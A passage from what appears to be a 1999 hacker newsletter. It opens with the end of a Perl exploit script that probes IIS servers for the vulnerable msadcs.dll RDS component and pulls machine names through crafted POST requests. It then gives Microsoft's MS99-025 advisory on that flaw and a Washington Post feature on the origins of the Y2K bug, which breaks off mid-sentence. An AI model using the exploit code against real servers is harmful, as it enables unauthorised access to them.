print "\n"; close(IN);}


##############################################################################


sub sendraw2 { # ripped and modded from whisker
sleep($delay); # it's a DoS on the server! At least on mine...
my ($pstr)=@_;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
open(OUT,">raw.out"); my @in;
select(S); $|=1; print $pstr;
while(<S>){ print OUT $_; push @in, $_; print STDOUT ".";}
close(OUT); select(STDOUT); close(S); return @in;
} else { die("Can't connect...\n"); }}


##############################################################################


sub content_start { # this will take in the server headers
my (@in)=@_; my $c;
for ($c=1;$c<500;$c++) {
if($in[$c] =~/^\x0d\x0a/){
if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
else { return $c+1; }}}
return -1;} # it should never get here actually


##############################################################################


sub funky {
my (@in)=@_; my $error=odbc_error(@in);
if($error=~/ADO could not find the specified provider/){
print "\nServer returned an ADO miscofiguration message\nAborting.\n";
exit;}
if($error=~/A Handler is required/){
print "\nServer has custom handler filters (they most likely are patched)\n";
exit;}
if($error=~/specified Handler has denied Access/){
print "\nADO handlers denied access (they most likely are patched)\n";
exit;}}


##############################################################################


sub has_msadc {
my @results=sendraw("GET /msadc/msadcs.dll HTTP/1.0\n\n");
my $base=content_start(@results);
return if($results[$base]=~/Content-Type: application\/x-varg/);
my @s=grep("Server",@results);
if($s[0]!~/IIS/){ print "Doh! They're not running IIS.\n" }
else { print "/msadc/msadcs.dll was not found.\n";}
exit;}


##############################################################################


sub get_name { # this was added last minute
my $msadc=<<EOT
POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
User-Agent: ACTIVEDATA
Host: $ip
Content-Length: 126
Connection: Keep-Alive


ADCClientVersion:01.06
Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0


--!ADM!ROX!YOUR!WORLD!--
EOT
; $msadc=~s/\n/\r\n/g;
my @results=sendraw($msadc);
my $base=content_start(@results);
$results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
print "Machine name: $results[$base+6]\n";}


##############################################################################


# Note: This is not a good example of precision code. It is very
# redundant and has a few kludges. I have been adding features in one at
# at a time, so it has resulted in redundant functions and patched code.
# I will be rewriting it in the future, sometime. Look for the newer code
# revisions at www.technotronic.com/rfp/
# This may also be included in the NT-PTK/P. If you don't know what that
# is, just wait and see. :)


##############################################################################


42.0 Highschool crackers
~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 20th July 1999 on 9:37 pm CET
Hacker broke into computer system at East Chapel Hill High School and ruined two
years worth of the principal’s work. School officials said that their system has been
penetrated before, but no such damage was done. They learned their lesson and now
they are installing 12.000 dollars worth of security software.

@HWA


43.0 Unauthorized Access to IIS Servers through ODBC Data Access with RDS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

by BHZ, Tuesday 20th July 1999 on 3:30 pm CET
Microsoft re-released Microsoft Security Bulletin MS98-004, issued July 17, 1998. As
they say: "It has recently been brought to our attention that this vulnerability has been
used to gain unauthorized access to Internet-connected systems that have
instructions in MS98-004"
. Just a reminder this advisory deals with The RDS
DataFactory object, a component of Microsoft Data Access Components (MDAC).
Read the re-released advisory at the url below;

http://www.microsoft.com/security/bulletins/ms99-025.asp



--===Microsoft Security Advisor Program: Microsoft Security Bulletin (MS99-025)===--


Microsoft Security Bulletin (MS99-025)

Re-Release: Unauthorized Access to IIS Servers through ODBC Data Access with RDS

*Originally Released as MS98-004, July 17, 1998*
*Re-Released as MS99-025, July 19, 1999*

_Preface_
This bulletin is a re-release of <B>Microsoft Security Bulletin MS98-004</B>
[http://www.microsoft.com/security/bulletins/ms98-004.asp] , issued July 17,
1998. It has recently been brought to our attention that this vulnerability
has been used to gain unauthorized access to Internet-connected systems that
have not been updated as per the instructions in MS98-004. The intent of
re-releasing this bulletin is to serve as a reminder about this vulnerability,
to restate the threat, and encourage system administrators to evaluate their
systems to determine if their systems have been correctly configured and
updated to protect against this vulnerability.
_Summary_
Microsoft encourages the following actions be taken on systems that have
Microsoft® Internet Information Server 3.0 or 4.0 and Microsoft Data Access
Components 1.5, both of which are installed during a default installation of
the Windows NT® 4.0 Option pack:
+ Install the latest version of MDAC (currently MDAC 2.1 SP2) However,
simply upgrading from MDAC 1.5 to MDAC 2.0, or MDAC 2.1 is not sufficient. For
systems not explicitly utilizing RDS functionality, you should also:
+ Delete the /msadc virtual directory from the default Web site, or
+ Apply registry settings that disable the DataFactory object. (See the Q
for the registry settings to adjust, or to download a .REG file that can make
the changes for you.) For systems implicitly utilizing RDS functionality, you
should:
+ Disable Anonymous Access for the /msadc directory in the default Web site,
and/or
+ Create a Custom Handler to control or filter incoming requests:
<B>http://www.microsoft.com/Data/ado/rds/custhand.htm</B>
[http://www.microsoft.com/Data/ado/rds/custhand.htm] If you do not complete
these steps, unauthorized access as described below may still be possible.
Frequently asked questions regarding this vulnerability and updating systems
to protect against it can be found at
_http://www.microsoft.com/security/bulletins/MS99-025faq.asp_

_Issue_
The RDS DataFactory object, a component of Microsoft Data Access Components
(MDAC), exposes unsafe methods. When installed on a system running Internet
Information Server 3.0 or 4.0, the DataFactory object may permit an otherwise
unauthorized web user to perform privileged actions, including:
+ Allowing unauthorized users to execute shell commands on the IIS system as
a privileged user.
+ On a multi-homed Internet-connected IIS system, using MDAC to tunnel SQL
and other ODBC data requests through the public connection to a private
back-end network.
+ Allowing unauthorized accessing to secured, non-published files on the IIS
system.
_Affected Software Versions_

+ Microsoft Internet Information Server 3.0 or 4.0 that have or have had
Microsoft Data Access Components 1.5 installed on it.
_NOTE:_ IIS can be installed as part of other Microsoft products like
Microsoft BackOffice and Microsoft Site Server.
_NOTE:_ MDAC 1.5 is installed during a default installation of the Windows NT
4.0 Option Pack.

_Patch Availability_
Newer versions of Microsoft Data Access Components (MDAC versions 2.0 and
2.1) resolve these known vulnerabilities. However, a system that had MDAC 1.5
installed on it, and then upgraded to MDAC 2.0 or MDAC 2.1 must still take
actions to disable the DataFactory object. (See the Q for the registry
settings to adjust, or to download a .REG file that can make the changes for
you.)
Current versions of Microsoft Data Access Components can be downloaded from
the following web site:
+ Microsoft Data Access Download Site:
<B>http://www.microsoft.com/data/download.htm</B>
[http://www.microsoft.com/data/download.htm]
_More Information_
Please see the following references for more information related to this
issue.
+ Microsoft Security Bulletin MS99-025: Frequently Asked Questions,
_http://www.microsoft.com/security/bulletins/MS99-025faq.asp_
+ Microsoft Knowledge Base (KB) article Q184375,
*Security Implications of RDS 1.5, IIS, and ODBC*,
<B>http://support.microsoft.com/support/kb/articles/q184/3/75.as</B>p
[http://support.microsoft.com/support/kb/articles/q184/3/75.asp]

+ Microsoft Universal Data Access Download Page,
<B>http://www.microsoft.com/data/download.htm</B>
[http://www.microsoft.com/data/download.htm]

+ Installing MDAC Q,
<B>http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm</B>
[http://www.microsoft.com/data/MDAC21info/MDACinstQ.htm]

+ Microsoft Security Advisor web site,
<B>http://www.microsoft.com/security/default.asp</B>
[http://www.microsoft.com/security/default.asp]
+ IIS Security Checklist,
<B>http://www.microsoft.com/security/products/iis/CheckList.asp</B>
[http://www.microsoft.com/security/products/iis/CheckList.asp]

_Obtaining Support on this Issue_
Microsoft Data Access Components (MDAC) is a fully supported set of
technologies. If you require technical assistance with this issue, please
contact Microsoft Technical Support. For information on contacting Microsoft
Technical Support, please see
<B>http://support.microsoft.com/support/contact/default.asp</B>
[http://support.microsoft.com/support/contact/default.asp] .

_Acknowledgments_
Microsoft acknowledges Greg Gonzalez of ITE
(<B>http://www.infotechent.net</B> [http://www.infotechent.net] ) for bringing
additional information regarding this vulnerability to our attention.
Microsoft also acknowledges Russ Cooper (<B>NTBugTraq</B>
[http://www.ntbugtraq.com/] ) for his assistance around this issue.

_Revisions_



+ July 19, 1999: Bulletin Created as re-release of MS98-004.


http://www.microsoft.com/security_
-->
-------------------------------------------------------------------------------

THE INFORMATION PROVIDED IN THE MICROSOFT KNOWLEDGE BASE IS PROVIDED "AS IS"
WITHOUT WARRANTY OF ANY KIND. MICROSOFT DISCLAIMS ALL WARRANTIES, EITHER
EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND FITNESS
FOR A PARTICULAR PURPOSE. IN NO EVENT SHALL MICROSOFT CORPORATION OR ITS
SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,
INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES, EVEN
IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE POSSIBILITY
OF SUCH DAMAGES. SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF
LIABILITY FOR CONSEQUENTIAL OR INCIDENTAL DAMAGES SO THE FOREGOING LIMITATION
MAY NOT APPLY.

_© 1999 Microsoft Corporation. All rights reserved. Terms of Use._




@HWA


44.0 Who's fault is the Y2K bug?
~~~~~~~~~~~~~~~~~~~~~~~~~~~

From http://www.net-security.org/

Y2K PORTFOLIO

by BHZ, Tuesday 20th July 1999 on 3:11 pm CET
Washington Post wrote terrific article on Y2K situation, its past and its present. They
even contacted "the man responsible" for Y2K bug - Robert Bemer. He wrote wrote
the American Standard Code for Information Interchange (ASCII) and popularized the
use of the backslash, and invented the "escape" sequence in programming. In the
late 50's he also helped on writing COBOL. He said that the early programmers were
unconcerned about the year 2000 because they expected their programs to last only
a few years - and that is how Y2K "bug" started. Read whole article below.

THE MILLENNIUM BUG

We Know It Can Hurt Us. We Know It Didn't Have To Be.
What We Didn't Know, Until Today, Was Whom We Can
Blame for Letting It Loose.

By Gene Weingarten
Washington Post Staff Writer
Sunday, July 18, 1999; Page F01

We are knocking at the door of a high-rise apartment in Baileys Crossroads,
with a question so awful we are afraid to ask it. We do not wish to cause a
heart attack.

A woman invites us in and summons her husband, who shuffles in from
another room. She is 78. He is 82. They met in the 1960s as
middle-management civil servants, specialists in an aspect of data processing
so technical, so nebbishy, that many computer professionals disdain it. He
was her boss. Management interface blossomed into romance. Their
marriage spans three decades. They are still in love.

"You know how we use Social Security numbers alone to identify
everyone?"
she says. She points proudly to her husband. "That all started
with this kid!"


The kid has ice cube spectacles and neck wattles. He has been retired for
years. Some of his former colleagues guessed he was deceased. His phone
is unlisted. We located him through a mumbled tip from a man in a nursing
home, followed up with an elaborate national computer search.
Computers--they're magic.

It is still early. We have, alas, roused them from bed.

She is feisty. He is pleasantly grumpy. They are nice people.

Here is what we have to ask him: Are you the man who is responsible for
the greatest technological disaster in the history of mankind? Did you cause
a trillion-dollar mistake that some believe will end life as we know it six
months from now, throwing the global economy into a tailspin, disrupting
essential services, shutting down factories, darkening vast areas of rural
America, closing banks, inciting civic unrest, rotting the meat in a million
freezers, pulling the plug on life-sustaining medical equipment, blinding
missile defense systems, leaving ships adrift on the high seas, snarling air
traffic, causing passenger planes to plummet from the skies?

Obligingly, he awaits the question.

He is wearing pajamas.

A Hot Date

By now, everyone knows that on Jan. 1, 2000, something dreadful will
happen on a global scale. Or possibly it will not. Experts are divided. This
much is indisputable: To prevent it, billions of dollars have already been
expended not only by government, which is prone to squandering money on
foolishness, but also by big business, which is not. This is no empty scare.

Technology has been the propulsive force behind civilization, but from time
to time technology has loudly misfired. In the name of progress, there have
been profound blunders: Filling zeppelins with hydrogen. Treating morning
sickness with Thalidomide. Constructing aqueducts with lead pipes, poisoning
half the population of ancient Rome. Still, there is nothing that quite
compares with the so-called "Millennium Bug." It is potentially planetary in
scope. It is potentially catastrophic in consequence. And it is, at its heart,
stunningly stupid. It is not like losing a kingdom for want of a nail; it is like
losing a kingdom because some idiot made the nails out of marshmallows.

On Jan. 1, 2000, huge numbers of computers worldwide are expected to fail
because, despite the foreseeable folly of it, they have always been
programmed to think of the year in two digits only.

The two-digit year is a convention as ancient as the feather pen--writing the
date on a personal letter with an apostrophe in the year, implying a prefix of
17- or 18- or 19-. But reading an apostrophe requires sentience and
judgment. Computers possess neither. They cannot distinguish an "00"
meaning 1900 from an "00" meaning 2000. When asked, for example, to
update a woman's age on Jan. 1, 2000, a computer might subtract her year
of birth (say, '51) from the current year ('00), and conclude she will not be
born for another 51 years. A human would instantly realize the nature of the
error, adjust his parameters, and recalculate.

Computers aren't built that way. They require absolute, either-or,
plus-or-minus, binary logic at every step of their operation, and if this process
is stymied even momentarily, if there is a juncture at which neither plus nor
minus yields a comprehensible response, a computer will react immaturely.
Sometimes it will start acting out--doing petulant, antisocial things such as
coughing out daffy data or obliterating files. More often, the computer will
simply burst into tears. It will shut itself down.

The permutations of the Y2K problem are bewildering. If General Motors
has fixed its computers, that's swell; but if the hydroelectric plant that sells
power to the subcontractor who imports the rubber that is used to make tires
for GM cars has not fixed its problem, the GM assembly line closes down
anyway. Plus, the Y2K problem is hard-wired into millions of
microprocessor chips, independent mini-brains that are embedded in things
like automobiles, traffic control systems, medical equipment, factory control
panels; some businesses aren't even certain where all their microprocessors
are.

Never has a calamity been so predictable, and so inevitable, tied to a
deadline that can be neither appealed nor postponed. Diplomacy is fruitless.
Nuclear deterrence isn't a factor. This can't be filibustered into the next
Congress.

Y2K has powerful, nearly mystical, themes. For some religious
fundamentalists who have long been predicting a millennial apocalypse, the
avenging instrument has finally loomed into view. For Luddites aghast at the
excesses of the industrialized world, Y2K is the perfect comeuppance. For
anyone who has ever read Vonnegut or Eliot, the ironies are lush.

This is the way the world ends. Not with a bang but a . . . crash.

Because society has been gamely focused on working together to forestall
disaster, not much effort has so far been expended on senseless
finger-pointing. The civility will end after the first of the year. Finger-pointing
will no longer be senseless. One question will be asked repeatedly, mostly by
attorneys gearing up for lawsuits:

Who screwed up?

The search for a culprit is an honored American tradition. It nourishes both
law and journalism. When things go bad, we demand a fall guy. A
scapegoat. A patsy.

Today we'll search for one, and find him.

The Unsquashable Bug

First, it isn't really a "bug."

The term "computer bug" was coined by Navy computer pioneer Grace
Hopper in the 1950s after a moth got into one of her machines and it went
haywire. A "bug" implies something unforeseeable.

The Y2K problem wasn't just foreseeable, it was foreseen.

Writing in February 1979 in an industry magazine called Interface Age,
computer industry executive Robert Bemer warned that unless programmers
stopped dropping the first two digits of the year, programs "may fail from
ambiguity in the year 2000."


This is geekspeak for the Y2K problem.

Five years later, the husband-wife team of Jerome T. and Marilyn J. Murray
wrote it much more plainly. In a book called "Computers in Crisis: How to
Avoid the Coming Worldwide Computer Systems Collapse,"
they predicted
Y2K with chilling specificity.

Few people read it. The year was 1984, and to many, the book seemed very
1984-ish: a paranoid Orwellian scenario. ComputerWorld magazine reviewed
it thus:

"The book overdramatizes the date-digit problem. . . . Much of the book can
be overlooked."


How could we have been so blind?

Basically, we blinded ourselves, like Oedipus. It seemed like a good idea at
the time.

Imagine you own a car that gets one mile to the gallon, and every additional
ounce in the passenger compartment further reduces the gas efficiency. You
would do anything you could to lighten your load. You might even drive
naked, gawkers be damned.

That's pretty much what occurred back in the 1950s, in the early days of
computers. Simple arithmetic calculations required a machine the dimensions
of a minivan. Memory was contained not in chips the size of fingernails but
in electrostatic vacuum tubes the size of cucumbers; small stores of memory
cost tens of thousands of dollars. Data were entered by punching holes in
stiff cards the size of airline tickets, each containing only 80 characters of
information. Businesses needed warehouses to store tons of cards. Anything
that reduced the amount of data, even slightly, saved money.

What followed was nearly inevitable. Programmers built a house of cards.

Most of them employed abbreviations, particularly to represent prosaic bits
of recurring data, such as the date. They expressed the month, day and year
in a total of six digits rather than eight.

Many programmers say today that they knew they were being sloppy. But
there were greater priorities.

So they drove naked.

Why didn't people realize earlier the magnitude of the problem they were
creating?

And when they did realize it, why was the problem so hard to solve?

Have Run, Will Travel

We sought the answer from the first man to ask the question.

Robert Bemer, the original Y2K whistleblower, lives in a spectacular home
on a cliff overlooking a lake two hours west of a major American city. We
are not being specific because Bemer has made this a condition of the
interview. We can say the car ride to his town is unrelievedly horizontal. The
retail stores most in evidence are fireworks stands and taxidermists.

In his driveway, Bemer's car carries the vanity tag "ASCII." He is the man
who wrote the American Standard Code for Information Interchange, the
language through which different computer systems talk to each other. He
also popularized the use of the backslash, and invented the "escape"
sequence in programming. You can thank him, or blaspheme him, for the
ESC key.

In the weenieworld of data processing, he is a minor deity.

We had guessed Bemer would be reassuring about the Y2K problem.

Our first question is why the heck he recently moved from a big city all the
way out to East Bumbleflop, U.S.A.

It's a good place to be next New Year's Eve, he says. From a kitchen
drawer he extracts two glass cylinders about the size of the pneumatic-tube
capsules at a drive-through teller. Each is filled with what appears to be
straw.

"They're Danish," he says. "They cost $500. We ran water with cow[poop]
through them and they passed with flying colors."


They're filters, to purify water. If Y2K is as bad as he fears, he says,
cocking a thumb toward his backyard, "we can drain the lake."

Bemer is 79. He looks flinty, like an aging Richard Boone still playing
Paladin.

He has started a company, Bigisoft, that sells businesses a software fix for
the Y2K problem. So, for selfish reasons, he doesn't mind if there is
widespread concern over Y2K, though he swears he really thinks it is going
to be bad. That's why he has requested that we not mention the town in
which he lives. He doesn't want nutballs descending on him in the hellish
chaos of Jan. 1, somehow blaming him.

Who, then, is to blame?

Bemer rocks back in his chair and offers a commodious smile.

In one sense, he says, he is.

Binary Colors

In the late 1950s, Bemer helped write COBOL, the Esperanto of computer
languages. It was designed to combine and universalize the various dialects
of programming. It also was designed to open up the exploding field to the
average person, allowing people who weren't mathematicians or engineers to
communicate with machines and tell them what to do. COBOL's commands
were in plain English. You could instruct a computer to MOVE, ADD,
SEARCH or MULTIPLY, just like that.

It was a needed step, but it opened the field of programming, Bemer says, to
"any jerk."

"I thought it would open up a tremendous source of energy," he says. "It did.
But what we got was arson."


There was no licensing agency for programmers. No apprenticeship system.
"Even in medieval times," Bemer notes dryly, "there were guilds." When he
was an executive at IBM, he said, he sometimes hired people based on
whether they could play chess.

There was nothing in COBOL requiring or even encouraging a two-digit
year. It was up to the programmers. If they had been better trained, Bemer
says, th

  
ey might have known it was unwise. He knew.

He blames the programmers, but he blames their bosses more, for caving in
to shortsighted client demands for cost-saving.

"What can I say?" he laughs. "We're a lousy profession."

Some contend that the early programmers were unconcerned about the year
2000 because they expected their programs to last only a few years. If that
is true, it was naive. Computers are forever becoming obsolete, replaced by
faster, better technologies, but the programs they run can be nearly
immortal. A good program is self-perpetuating, tested over time, wrinkles
ironed out through updates, a solid foundation for all that follows. The house
above it may be fancified, with spiffy new wings and porticoes, but the
foundation remains. Which goes to the heart of the Y2K problem.

The longer a program is used, the larger the database and supporting
material that grow around it. If, say, a program records and cross-references
the personnel records in the military, and if the program itself abbreviates
years with two digits, then all stored data, all files, all paper questionnaires
that servicemen fill out, will have two-digit years. The cost of changing this
system goes way beyond the cost of merely changing the computer
program.

It's like losing your wallet. Replacing the money is no sweat. Replacing your
credit cards and ATM card and driver's license and business-travel receipts
can be a living nightmare.

And so, even after computer memory became cheaper, and data storage
became less cumbersome, there was still a powerful cost incentive to retain
a two-digit year. Some famously prudent people programmed with a
two-digit date, including Federal Reserve Chairman Alan Greenspan, who
did it when he was an economics consultant in the 1960s. Greenspan
sheepishly confessed his complicity to a congressional committee last year.
He said he considered himself very clever at the time.

In their omnibus 1997 manual for lawyers planning Y2K litigation--an
excellent if unnerving document of 600-plus pages--attorneys Richard D.
Williams and Bruce T. Smyth suggest that IBM and other computer
manufacturers might be partially at fault for not addressing the problem in
the early '60s by advising their customers of the wisdom of a four-digit year.
In 1964, IBM came out with a its System/360 computers, which
revolutionized the industry. It built upon existing programs, yet required much
new software. Should IBM have seized the moment to make things right?

"That would have been stupid," responds Frederick Brooks, a University of
North Carolina computer science professor. In the 1960s, Brooks was
IBM's project manager for the System/360.

The average 360, he says, had either 16 or 32 kilobytes of memory, 12 of
which were needed to run the operating system. What was left was less
memory than is available today in a hand-held personal organizer from Radio
Shack. Every possible memory-conserving device had to be employed. And
the year 2000 was far, far away.

"I never heard anyone seriously propose a four-digit year," he recalls. It is
not as if a two-digit year was set in stone anywhere, he says. It just became
a logical convention, across the industry.

So Y2K was inevitable?

No. As time passed and memory became cheaper and the end of the
century got closer, Brooks says, "the cost of using four-digit years went
down gradually, and the wisdom of using them went up gradually."

When did the two lines cross on the graph?

Around 1970, he says. But competitive pressures kept managers from
making that expensive decision. By the mid-1980s, it was too late.
Computers were everywhere, their programs hopelessly infected with the
problem.

Could anything have changed corporate attitudes earlier?

The former IBM man ponders this.

"If we had adopted industry-wide standards by some standards group,
standards everyone would have had to follow, there would be no competitive
pressures for cost." But nothing like that ever happened, he says.

Actually, Brooks is wrong. Something very much like that happened. A
group did adopt a written standard for how to express dates in computers.

We are looking at it now.

It is a six-page document. It is so stultifying that it is virtually impossible to
read. It is titled "Federal Information Processing Standards Publication 4:
Specifications for Calendar Date." It is dated Nov. 1, 1968, and took effect
on Jan. 1, 1970, precisely when Brooks says the lines on the graph crossed,
precisely when a guiding hand might have helped.

On Page 3, a new federal standard for dates is promulgated.

Sometimes, someone makes a reasonable-sounding statement that, in the
merciless glare of history, seems dreadfully unwise: "Separate but equal" is
one of these. Also: "I believe it is peace in our time," an opinion rendered by
Neville Chamberlain weeks before the outbreak of World War II.

Federal Information Processing Standards Publication 4, Paragraph 4 and
Subparagraph 4.1, is another of those statements. Here it is, in its entirety:

Calendar Date is represented by a numeric code of six consecutive positions
that represent (from left to right, in high to low order sequence) the Year,
the Month and the Day, as identified by the Gregorian Calendar. The first
two positions represent the units and tens identification of the Year. For
example, the Year 1914 is represented as 14, and the Year 1915 is
represented as 15.

Ah.

The Y2K problem.

Set in stone.

By the United States government.

FIPS 4, as it was called, was limited in scope. It applied only to U.S.
government computers, and only when they were communicating from
agency to agency. Still, it was the first national computer date standard ever
adopted, and it influenced others that followed. It would have affected any
private business that wanted to communicate with government computers. It
might have been a seed for change, had it mandated a four-digit year.

It was a missed opportunity. Who screwed up?

The Standard Bearers

Harry S. White Jr., 64, places a briefcase on the table. It is heavy. He has
documents.

We are meeting in a conference room at a Holiday Inn in Morgantown,
W.Va., to plumb ancient history. White helped write FIPS 4; at the time he
was with the National Bureau of Standards.

White says he is pleased to meet us. He holds out a hand. In it is a Bible.

"Be careful with that," he says mildly. "It's powerful. If you open it, it will
have an impact on your life."

White is West Virginia chairman of The Gideons International, the
gentlemen's organization that places Bibles in hotel rooms. He is now
semi-retired, but for much of his life he was an expert on standardizing
computer codes, a scientist whose field involved the proper sequencing of
digits and symbols. God, they say, is in the details.

In the 1960s and '70s, White was one of a few dozen computer experts who
met regularly on committees to try to get government and industry to use
identical conventions in programming. It was an important job, but a
thankless one. Programmers sometimes consider themselves as creative as
novelists; to them, standards experts are squinty-eyed, pencil-necked
editors--necessary, perhaps, but nit-picky and annoying.

In this insular world, all debates are about small things; so small things can
become very large.

Harry White says that back in 1968, he was opposed to a two-digit year. He
did not exactly foresee the extent of the Y2K problem but there was
something about two digits that offended his sense of the rightness of things:
"If it is four digits," he says, "it is everlasting."

But FIPS 4 was produced by a committee, White explains. A committee.
When a committee tries to design a horse, it can come up with a jackass.

On the committee were representatives of several government agencies,
among them the Office of Management and Budget, NASA, the General
Services Administration and the Department of Defense. Defense was by
far the biggest computer user in the federal government, probably in the
world, White says, and its input was disproportionately influential. The
Defense Department, he says, opposed the four-digit year because it would
have meant rewriting all its programs, and all the supporting data. Defense
had bigger worries. We were neck deep in Vietnam.

Besides, White says, there was a much larger issue on the table: the precise
order in which the day, month and year would be written. DOD wanted to
keep its system, familiar to Europeans and the American military:
day/month/year. Others wanted the standard month/day/year sequence, the
way Americans write it on personal correspondence. Whether years would
be four digits or two seemed a minor matter. Even those people like Bemer
and White, who sensed a problem, had no real understanding of its potential
scope: In the 1970s few people anticipated how thoroughly computers would
come to dominate our lives.

Eventually, White says, Defense gave up on the issue of the order of the
date, but it held fast on the two-digit year.

Three years later, the American National Standards Institute issued its own
voluntary standard for expression of date in computer language. This was
ANSI standard X3.30, which was drafted by, and for, both government and
industry. Harry White was chairman of the subcommittee that addressed the
issue of date. The Defense Department, White says, remained solidly
opposed to change: It stuck to its guns, as it were.

The initial proposal was for a two-digit year, just like FIPS. But eventually,
White said, he and others prevailed. The final standard was for a four-digit
year, including the prefix 19- or 20-. But as a compromise with the Defense
Department, White says, the Standards Institute added an option:
Programmers could stick with a two-digit year if they wanted to.

That gave everyone an out. In essence, government and business
programmers could choose to adopt the recommended standard, at the cost
of many millions of dollars, or they could ignore it completely, without
technically having committed a sin.

"That," says Robert Bemer, "was devastating. It was an excuse to put it on
the shelf."

Who screwed up? Was anyone in particular behind this?

Harry White shuffles his papers.

"The director of data standards for the Office of the Secretary of Defense. I
used to work for him."

Who was he?

"I don't want to give the impression that I was a hero and he was a bad guy.
There was just a difference in making judgments and decisions."

Give us a name, Harry.

"Bill Robertson. He married his assistant, Mildred Bailey. "

Harry and Bill

Bill and Mildred are amiable, despite being ambushed in their jammies in
their Baileys Crossroads apartment. They are wearing socks and slippers.
She is redheaded, lean and energetic. He is solidly built, a little deliberate
afoot.

We tell them why we are there.

"Anyone who says the Department of Defense was against the four-digit
year is full of crap," Bill Robertson says. "Harry White made that up out of
his own imagination, whole cloth." The issue never came up, Robertson said,
at least not exactly that way.

Robertson and Bailey both deny their office was ever even consulted on the
FIPS 4 regulation, though it did have input into the ANSI standards.
Robertson says he does not recall ever being asked to comment specifically
on a four-digit year, though he agrees the Department of Defense did in
general oppose major changes to its computer system. Change would have
been costly. The various armed services would not have stood for it.

"We would have had to change every stinking file," Bailey says.

"We would have had a revolt," Robertson says. If someone had ordered
them to change, "we would have said, 'Blow it out your airbag.' "

However, it was all moot, he claims. The Department of Defense already
had a system for recording the date, a system Robertson helped develop and
implement back when he was in the Air Force. Robertson wanted it to be a
national system.

What was their system?

It had a two-digit year in it, he says.

Aha!

But, Robertson says, his system included something else. A date was
designated by "data elements." The month, year and day were only three
elements of five. There was another element, for optional use, that would
have indicated which century it was, and yet another indicating which
millennium. If you chose to put those in, it would tell the computer to
distinguish between centuries. It was the solution to the Y2K problem, but it
was never adopted nationally.

Bill's system never would have worked, Harry replies: "See, this is where we
ran into that kind of problem with him! This was his definition of data
elements, but the rest of the world would not accept this definition!"

Harry says Bill was "a very narrow, bullheaded individual. When it came to
matters of being able to compromise, he was totally inflexible."

Bill says Harry was the bullheaded one. He wouldn't listen to reason.
Wouldn't join him in his data elements program. "We had the answer in
1964. Harry never tried to get on board!"

Once, Bill says, Harry got into a shouting match with one of Bill's deputies
on a philosophical dispute about how to express the concept of midnight. It
nearly came to blows.

Harry says Bill was envious of him because he eventually rose above Bill,
his former boss, to a position of higher authority in the field of data
standards: "He never got over it," Harry says.

Bill says Harry was the envious one, ever since the day Bill beat him out for
the Department of Defense standards job.

"Harry and I interviewed for the same job. Has it occurred to you why I got
it and he didn't? He didn't understand standards!"

Did too, Harry says.

Did not, Bill says.

James Gillespie was a computer standards man for the Navy. He worked
with both White and Robertson, on ANSI deliberations. He liked them both,
he said, but the two men could not get along.

"They had a personality conflict that impeded progress," Gillespie said.

For some danged reason, the negotiations over computer date lasted a very,
very long time. And for some danged reason, nothing very handsome was
accomplished.

In the end, what was produced was FIPS 4 and ANSI X3.30, neither of
which protected the world against Y2K.

Today, both Harry and Bill scorn the FIPS 4 and ANSI X3.30 standards as
weak and muddled.

It may be the only thing in the whole entire world they agree on.

File Not Found

We've tried to further research this Harry-Bill contretemps. Many of the
participants are dead; others' memories are indistinct. Harry says there
should be a paper trail showing the Defense Department's complicity in all
this--but the official government file on the FIPS 4 document is as thin as
leaf. There's no paper trail.

Harry suspects chicanery: He theorizes the records were either "shredded or
placed where they are not in the public domain."

A spokesman for the National Institute of Standards and Technology, keeper
of the FIPS files, confirms that other FIPS regulations have bulging folders,
but not FIPS 4. He does not know why, but says there is no evidence any
larger file ever existed. There is certainly no coverup, he said.

Ruth Davis is president of the Pymatuning Group, a technical management
firm in Alexandria. In the 1970s, she was Harry White's boss at the National
Bureau of Standards. She remembers Harry being apoplectic at the
intransigence of the Department of Defense on the issue of the four-digit
year. But she says she never really blamed DOD. The cost, she said, would
have been huge.

Davis had once worked for Defense, and understood the necessity of saving
space. At times, she said, it was a life-or-death priority. Back then, she said,
Defense had to maintain control of rockets during their launches.
Calculations had to be made in real time. This required quickness, which
required computer memory. They couldn't screw around with four-digit
dates.

She said it would be wrong to blame any one person at DOD. It was policy,
top to bottom. Plus, it made sense.

So we can't blame Bill?

"You can't blame anyone."

Damn.

Tomorrow Is Another Day

Maybe we're looking at this thing all wrong. Maybe it isn't about people, at
all. Maybe it is just about numbers.

Maybe, in the early days, there simply never was a good solution to a basic
problem of space: A six-digit date was much more economical than eight.
Maybe a problem at century's end was unavoidable, since you could not
possibly express the date unambiguously in six digits alone.

Except, you could. Astronomers do. They deal in distances so vast that light
takes millions of years to traverse them. So astronomers are forever having
to add and subtract time periods that span centuries. Since the 1700s, they
have found a simple way to do this, with a minimum of figuring or adjustment
for leap years and the like: They use something called the Julian day number,
adapted from the ancient Julian calendar.

In this system, the day Jan. 1, 4713 B.C., is arbitrarily taken as Day 1, the
beginning of time. And every day thereafter is numbered sequentially, as a
single number. For example, Jan. 1, 2000, the day of the presumed Y2K
Armageddon, would be Julian Day 2,451,545.

In Julian day calculations, there is never a need for Month, Day, or Year.
There is no ambiguity about centuries, because there is no century. Julian
day numbers are, at least theoretically, the perfect solution to the Y2K
problem.

The modern Julian day number is seven digits long. But, if you used it in
computers, you could safely drop the first one. That abbreviation would
eventually create a Y2K-type ambiguity, but that ambiguity would not occur
until A.D. 3501, when the Julian date would hit 3,000,000. By then we might
